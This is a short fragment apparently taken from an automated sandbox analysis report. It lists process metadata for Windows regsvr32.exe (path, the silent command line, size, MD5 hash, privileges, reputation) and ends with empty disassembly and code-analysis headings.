      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -s
      Imagebase:0xff580000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Code Analysis

      Reset < >